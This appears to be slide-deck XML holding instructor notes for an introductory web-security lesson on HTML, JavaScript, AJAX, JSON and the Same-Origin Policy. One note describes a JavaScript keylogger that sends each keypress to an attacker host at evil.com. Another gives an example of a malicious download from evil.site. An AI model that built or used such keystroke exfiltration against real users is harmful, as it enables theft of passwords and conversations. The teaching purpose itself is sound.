            <p:ph type="sldNum" sz="quarter" idx="5"/>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420956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Finally, explain that CSS can also be applied using IDs.</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Explain that class rules are defined with a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" i="0" dirty="0"/>
              <a:t>hash sign</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" i="0" dirty="0"/>
              <a:t>#</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t>), followed by the HTML id to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Explain that only </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" i="1" dirty="0"/>
              <a:t>one</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t> element on a page can have a given ID.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" b="1" i="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" u="none" dirty="0"/>
              <a:t>Let students know that IDs are important because they’re often used by developers and attackers alike to extract or insert information into specific areas of a page.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>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1076288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Explain that JavaScript (JS) is the programming language used by browsers to manipulate web pages.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>- Explain that JS is both what provides "life" to web pages, as well as one of the most significant security liabilities faced by web applications.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>- Explain that JavaScript is used for the following tasks:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>  - Adding interactivity to web pages</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>  - Send data to/from the network from the browser</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>  - Facilitating data transfers between clients/servers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>- Emphasize that, in order to add interactivity to web pages, JS has to be able to change the page's HTML in response to user actions.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>  - This allows attackers to update web pages with malicious content after they've been loaded.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>- This slide contains a simple example of using JavaScript to add fancy scroll effects to the page.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>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1968795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AJAX stands for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>A</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t>synchronous </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>J</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t>avaScript </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>A</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t>nd </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>X</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t>ML.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" b="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t>Explain that this is just a fancy acronym for: “sending HTTP requests with JavaScript.”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" b="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t>Explain that AJAX allows web applications to send and request data from servers on the web.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" b="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t>Explain that this is used on legitimate sites like, e.g., BuzzFeed, to load more and more content as users scroll down the page (“infinite scroll”).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" b="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t>Explain that this feature also allows attackers to read sensitive data from a user’s browser, and send it to their own malicious server (data exfiltration via AJAX).</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>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3011566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explain that JavaScript gave rise to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>JSON</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t>, or </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>J</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t>ava</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>S</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t>cript </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>O</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t>bject </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>N</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t>otation.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" b="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t>Explain that JSON is</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> one of the most popular ways for clients and servers to format request/response data.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Explain that JSON syntax is identical to the syntax used to create objects in JavaScript (which are equivalent to dictionaries in Python).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>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08366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Point out that JavaScript's ability to send/receive data over the network is powerful, but is also a security liability.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Explain that this snippet is an example of why. It sends every key the user presses to an attacker’s server at http://evil.com, using an HTTP GET request and JavaScript’s ability to respond to user events (in this case, a key press).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Point out that, if an attacker can get this onto a web page that you visit, they’ll be able to see every key you press while you’re on it—allowing them to steal usernames, passwords, and conversations!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Explain that attacks that allow hackers to get malicious JavaScript </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Reassure students that they don’t need to understand this code snippet—this is simply for exposure to what JS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>loks</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> like. The main takeaways are that JavaScript can be used for:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="628650" lvl="1" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Adding interactivity to web pages</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>  - Send data to/from the network from the browser</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>  - Facilitating data transfers between clients/servers</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>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1193541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err="1"/>
              <a:t>emind</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> students that the "basic" file describing a web page is an HTML document.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" b="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t>- Remind students that HTML documents can contain links to files like CSS, JavaScript, and images.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" b="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t>- Explain that, when a browser loads a web page, it proceeds as follows:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t>  - First, send a request for the page HTML</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t>  - Next, read the HTML from the top down</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t>  - Issue another request for every tag containing a link (except for anchor tags, which only fire requests when clicked)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" b="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t>- Let students know that, to inspect a page's HTML, they can use the `view-source` browser directive.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" b="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t>- Open a browser, and navigate to: `https://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>bootstrapmade.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t>/demo/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>bizpage</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t>/`.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" b="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t>- Click in the URL bar, and add `view-source` to the beginning: `</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>view-source:https</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t>://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>bootstrapmade.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t>/demo/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>bizpage</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t>/`.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" b="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t>- Point out that loads the HTML used to generate the web page displayed initially.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" b="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t>- Point out some of the links in the HTML. In particular, at the top of the page, note the `&lt;link </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>rel</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t>="stylesheet"...&gt;` tags.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t>  - These contain links to CSS used to style the page.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" b="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" b="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> Scroll to the very bottom of the page, and point out the `&lt;script&gt;` tags that link to external JavaScript.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t>  - These load scripts used by the page to power scroll effects, the image slideshow, etc.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t>  - Also point out the final script tag, which contains raw JS, instead of a link to an external file.</a:t>
            </a:r>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694332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3496919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Open and explain the solution in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Activities/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>Stu_Pillars_of_Web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>/Solved/README.md</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t>.</a:t>
            </a:r>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3928462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HTML and CSS documents can cause the browser to send requests to potentially malicious web pages, which users obviously would not want fulfilled.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Point out that some files, like JavaScript, can potentially be used to malicious effect directly.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Explain that two related mechanisms that address this issue are the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Same-Origin Policy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t>, and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Cross-Origin Resource Sharing</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>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275771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notes on major fields within the industry that intersect with the web, such as:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Risk Assessment</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, where an understanding of the web as an attack surface is crucial.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Penetration Testing</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t>, increasingly required for standards compliance, and particularly relevant given most websites’ degree of exposure.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Security Engineering</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t>, a subset of development focusing on the implementation and promotion of engineering best practices.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>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573892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Point out that there are clear security concerns around allowing a website to load files from arbitrary sites on the web.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>  - For example, a hacker could host a site at `https://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>friendlyblog.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>`, and embed a link that downloads the file `https://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>evil.site</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>dangerous_file.exe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>` from one of their malicious servers.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>- Explain that browsers have security policies in place to prevent this kind of abusive resource sharing. The most important is called the **Same-Origin Policy (SOP)**.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>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1135310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 According to the SOP, browsers can only load content for a web page if it comes from the same _domain_.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t>  - This means that, when you load `https://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0" err="1"/>
              <a:t>amazon.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t>`, your browser can download other files from the Amazon domain, like ,`https://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0" err="1"/>
              <a:t>amazon.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0" err="1"/>
              <a:t>favicon.ico</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t>`, but _not_ files like `https://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0" err="1"/>
              <a:t>othersite.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0" err="1"/>
              <a:t>catpic.png</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t>`.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>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3784359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5"/>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1809482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table indicates whether each of the URLs in the table has the same origin as the “base URL” in the heading, which is: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>http://store.company.com/dir/page.html</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Point out that the base URL has the following properties:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Protocol</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>: http</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Domain</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>: store.company.com</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Port</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>: 80 (default for HTTP)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1200" b="0" dirty="0">
              <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" dirty="0">
